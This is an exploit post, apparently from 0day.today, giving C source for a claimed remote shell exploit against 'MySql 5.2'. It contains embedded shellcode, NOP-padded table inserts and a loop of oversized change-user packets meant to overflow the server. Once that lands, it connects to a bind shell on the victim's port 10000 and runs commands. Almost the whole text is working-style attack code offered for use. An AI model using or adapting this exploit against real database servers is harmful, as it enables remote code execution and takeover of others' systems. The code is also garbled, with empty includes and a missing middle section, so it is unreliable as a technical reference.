============================================== MySql version 5.2 Change password length shell ============================================== I know I know it's been a while, I've been that much into xss and forget about the rest.. Mad respect Inj3ct0r, please do not remove the comment that says Note: None is allowed to post this to exploit-db.com /* MySql version 5.2 Change password length shell * * Usage: ./mysqlexploit -h localhost -u boof -p boof -t user -d mydb -g port * * Tested on: MySql 5.2 other versions may be variable * * Greetings to: Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Eidelweiss * * Note: None is allowed to post this to exploit-db.com * * Tested on: MySql 5.2 other versions may be variable */ #include #include #include #include #include #include #include #include #include /* shellcode 88 bytes*/ char *shellcode="\x31\x66\x6C\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x27\x01\x08\x00\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; char db[50]="test"; // writable database char victim[100]="localhost"; int offset=0; /* Connect to port 10000 */ int do_connect(char *host) { struct hostent *he=gethostbyname(host); struct sockaddr_in sa; int outsocket,r; struct timeval tv; fd_set rfds; char buffer[500]; memset (&sa, 0, sizeof (struct sockaddr_in)); memcpy (&sa.sin_addr.s_addr, he->h_addr_list[0], he->h_length); sa.sin_family = AF_INET; sa.sin_port=htons(10000); outsocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if ((connect(outsocket,(struct sockaddr *)&sa,sizeof(struct sockaddr_in)))==-1) return 0; FD_ZERO (&rfds); send(outsocket,"uname -a;\nid;\n",14,0); printf("[+] Successful, Run your shell!: \n"); while (1) { FD_SET (outsocket, &rfds); FD_SET (0, &rfds); tv.tv_sec = 30; tv.tv_usec = 0; select (outsocket + 1, &rfds, NULL, NULL, &tv); if (FD_ISSET(outsocket, &rfds)) { if ((r=recv(outsocket, buffer, sizeof(buffer), 0))==-1) exit(2); write(1,buffer,r); } if (FD_ISSET(0,&rfds)) { r=read(0,buffer,sizeof(buffer)); send(outsocket,buffer,r,0); } } return 1; } /* Print a silly joke! */ int nice_bar (int a,int max) { int i; int b=a*50/max; printf("0 ["); for (i=0;i<=b;i++) printf("."); for(;i<50;i++) printf(" "); printf("] 100%\r"); fflush(stdout); } /* Try a query in mysql server */ int do_query(MYSQL *s, char *query) { if (mysql_query(s,query)) { fprintf(stderr,"Query failed (%s)\n",mysql_error(s)); exit(1); } } /* Boof the index cache */ int do_index(MYSQL *s) { char query[1000]; MYSQL_RES *res; printf("[+] Boofing index cache\n"); sprintf(query, "select * from %s.ow having u='junk';",db); do_query(s,query); if (!(res=mysql_store_result(s))) { printf("[-] Failed index cache boof\n"); } mysql_free_result(res); } /* Collect mysql database */ int populate (MYSQL *s) { char buf1[300]; char query[1000]; int i; memset(buf1,0,sizeof(buf1)); memset(query,0,sizeof(query)); memset(buf1,'\x90',249-strlen(shellcode)-offset); strcat(buf1,shellcode); printf("[+] Creating temporal tables...\n"); sprintf(query,"use %s;",db); do_query(s,query); do_query(s,"create table oy(h varchar(250),a varchar(250));"); sprintf(query,"insert into oy(h,a) values (\"%s\",\"%s\");", buf1,buf1); do_query(s,query); do_query(s,query); do_query(s,query); do_query(s,query); do_query(s,"create table ow(u varchar(250),d varchar(250),index(u,d));"); printf("[+] Collecting database.. this will take a time..\n"); for(i=0;i -u -p " " -t \n\t[ -d writable_db] [ -g port ]" "[ -o offset ] [ -s microsecs_sleep ] [ -n ]\n",argv[0]); exit(1); } while((opt=getopt(argc,argv,"h:u:p:t:d:o:s:g:n"))!=EOF) switch(opt) { case 'h': strncpy(victim,optarg,49); break; case 'u': strncpy(user,optarg,49); break; case 'p': strncpy(pass,optarg,49); break; case 't': strncpy(ouser,optarg,49); break; case 'd': strncpy(db,optarg,49); break; case 'g': port=atoi(optarg); break; case 's': stime=atol(optarg); break; case 'o': offset=atoi(optarg); if (offset>249-strlen(shellcode)) { printf("[-] Maximun offset: %d\nAborting...\n", 249-strlen(shellcode)); exit(-1); } break; case 'n': pop=0; break; } printf("[+] Do something with Params: \n"); printf("[+] Host: %s Port: %d User: %s Pass: %s\n",victim,port,user,pass); printf("[+] Target_User: %s Writable_Database: %s\n",ouser,db); printf("[+] Offset: %d Collect: %s Sleep: %llu\n\n",offset, pop?"yes":"no",stime); signal(SIGALRM,sig_hand); printf("[+] Conecting...\n"); mysql_init(&mysql); if (!(sock = mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) { fprintf(stderr,"[-] Couldn't connect!\n%s\n",mysql_error(&mysql)); exit(1); } printf("[+] Connected: Version %s\n",mysql_get_server_info(sock)); printf("[+] Starting attack.. Rebuilding the base..\n"); strcpy(abuf,ouser); hashpass=abuf+strlen(abuf)+1; strcpy(hashpass,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"); if (pop) populate(sock); do { do_index(sock); net_clear(&sock->net); if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+strlen(hashpass)+2)) { printf("[-] Can't send command to server.\n"); } alarm(5); if (my_net_read(&sock->net)==packet_error) { alarm(0); printf("[+] Packet error..;)\n"); usleep(stime); mysql_init(&mysql); if (!(sock=mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) { printf("[-] Something is wrong!?\n"); exit(1); } } else { printf("[-] Attack failed!\n"); } alarm(0); } while(1); mysql_close(sock); } # 0day.today [2018-01-01] #

Query Builder